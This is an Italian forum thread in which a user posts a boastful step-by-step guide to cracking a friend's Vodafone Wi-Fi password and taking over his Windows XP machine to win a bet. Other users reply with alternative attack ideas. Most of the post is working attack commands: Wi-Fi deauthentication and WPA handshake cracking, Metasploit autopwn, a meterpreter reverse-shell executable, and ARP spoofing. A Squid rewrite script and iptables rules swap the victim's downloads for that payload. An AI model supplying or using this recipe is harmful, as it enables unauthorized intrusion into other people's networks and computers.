owning vodafone router + Windows XP service pack 3 (updated)

[saeko]

salve a tutti, oggi pomeriggio ho vinto una birra ( tramite scommessa ) ? ecco qui la guida per vincere una birra :)
ecco come vincere una birra (= ps: USATE SUDO DAVANTI AI COMANDI, poichè io ero loggato da root ^^

durante un dibattito lui diceva che la sua password del wifi ( quella di default del router vodafone ) era inviolabile, e che anche uno si fosse connesso non avrebbe potuto creargli problemi perchè aveva windows SP 3 , quindi abbiamo fatto una scommessa che non era cosi, lui mi ha detto che potevo provare ad entrargli , e se ci fossi riuscito mi offriva una lime corona
ok iniziamo:

allora prima di tutto

TOOL REQUIREMENT:

NMap ( Included on bt4 or bb )
Ettercap ( Included on bt4 or bb )
CoWPAtty ( coded by god )
Rainbow tables ( in questo caso della vodafone e quindi http://www.megaupload.com/?d=IGN8BQN3 )
Squid3 ( reposity debian-based )
Metasploit
Apache2
ok iniziamo:
per prima cosa ho attivato il monitor di aircrack

Code Select Expand

airmon-ng start wlan0
e poi ho scansionato fino a trovare il suo bssid , essid , channel, e un client ( il suo telefono nokia ) connesso tramite:

Code Select Expand

airodump-ng mon0
ok poi specifichiamo il range di airodump tramite:

Code Select Expand

airodump-ng --channel CHANNEL --bssid BSSID --write file mon0
e ho deauthenticato il suo cellulare dalla rete

Code Select Expand

aireplay-ng --deauth 1 -a BSSID -c CLIENT_DA_DEAUTHENTICARE_MAC mon0
ok ottenuto l'handshake WPA, diamo il file cap in pasto a coWPAtty (=

Code Select Expand

cowpatty -s ESSID -r file.cap -d vodafone
aspetto un pò di minuti , e tatata ecco la sua password! =)
bon connetttiamoci alla sua rete:

Code Select Expand

wpa_passphrase ESSID PASSWORD > amico.conf
wpa_supplicant -Dwext -iwlan0 -c /root/amico.conf
dhclient wlan0
ok sono connesso YO ,
ok iniziamo con il trovare tutti gli host connessi ^^

Code Select Expand

nmap -sP -T4 -n 192.168.1.1-255

trovo 4 target
192.168.1.1 # Router
192.168.1.2 # (= io
192.168.1.3 # Suo fisso
192.168.1.4 # Suo nokia

ok allora per prima cosa, provo un metasploit autopwn =) che non darà nessun esito

Code Select Expand

/etc/init.d/postgresql start
 aprite da root il terminale psql e creo l'utente:

Code Select Expand

ALTER USER saeko WITH PASSWORD 'banana';
\q
ok aprite msfconsole

Code Select Expand

db_driver postgresql
db_connect saeko:"banana"@localhost/msf
db_nmap -sS -T4 -O 192.168.1.3
db_autopwn -x -e -R great

ma nulla....
allora proviamo una strategia stranaaa! (=
avviamo apache2, in /var/www
creiamo un file .htaccess con questo:

Code Select Expand

Options +FollowSymlinks
RewriteEngine on
RewriteRule ^(.*) exploit.exe
a cosa serve? semplice per reindirizzare tutte le pagine sul nostro eseguibile  exploit.exe che ora creeremo ^^ ok apriamo

Code Select Expand

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 X > /var/www/exploit.exe
ora avviamo apache2:

Code Select Expand

/etc/init.d/apache2 start
ora ho modificato squid3 in maniera da permettere il suo funzionamento pure sulle reti locali, basta cercare localnet e decomentare la propria sottorete, e poi attivare tramite decomentazione di http_access allow localnet , e poi cerchiamo 3128, e aggiungiamo transparent (= e infondo mettiamo:
url_rewrite_program /percorso/prossimoscript.pl
il prossimo script formato cosi:

Code Select Expand

use IO::Handle;
use File::Basename;

$myip = "192.168.1.2";
while (<>) {
  chomp $_;
  if ($_ =~ /(.*\.exe)/i) {
     $file = basename( $1 );
     $new_url = "http://$myip/$file";
     print "$new_url\n";
  }
  else {
     print "$_\n";
  }
}

avviamolo

Code Select Expand

/etc/init.d/squid3 restart
ora settiamo iptables sul nostro pc

Code Select Expand

iptables -t nat -a PREROUTING --in-interface wlan0 -p tcp --destination-port 80 --jump REDIRECT --to-port 3128
echo 1 > /proc/sys/net/ipv4/ip_forward
ok ora ho iniziato un attacco di tipo arp spoofing ( spiegato nel precedente articolo )

con:

Code Select Expand

ettercap -T -M arp -i wlan0 // /192.168.1.2/
ho avviato multi/handler da msfconsole

Code Select Expand

use exploit/multi/handler
set LHOST 0.0.0.0
exploit -j
poi con una scusa gli ho fatto scaricare firefox 4, dello stile, comunque veramente una meraviglia sto firefox 4, lui : davvero va cosi bene? aspetta che lo provo! cosi è caduto nella mia trappola, ha scaricato un exe, che non era l'installer di firefox 4 ma il nostro exploit.exe

e di poi lifeissimple, aperta la sessione meterpreter, spari un getsystem e hai vinto...

Saeko < http://saekoninja.blogspot.com/ >

[clshack]

Dal RewriteEngine on in poi avrei cambiato parecchie cose :P

Solo un pirla poteva aprire un file exe che non stava scaricando :)

Io avrei semplicemente attivato un exploit tipo flash oppure per ie su metasploit sulla porta 80 e dopo avrei effettuato un arp poisoning oppure un dns poisoning redirezionando  il trafficco web sul mio server dove in ascolto metasploit avrebbe lanciato l'exploit :)

Operazione più trasparente :)  

[giaba90]

 per Saeko

cowpatty -s ESSID -r file.cap -d vodafone

al posto della -d non dovrebbe andare -f      ?


ho capito perchè cowpatty nn voleva installarsi: mancavano delle librerie quindi per chi ha opp avrà problemi dovrà installare
libpcap0.8-dev , libssl-dev e libcap-dev

[evilsocket]

un po macchinoso come metodo (+ che altro perchè si basa sulla fiducia, se non fosse stato tuo amico o conoscente ce l'avresti fatta a fargli scaricare qualcosa con un po di social? :)) ma figuo! :)

[laska]

qualcuno è in possesso di altre rainbow tables??? oltre per vodafone:)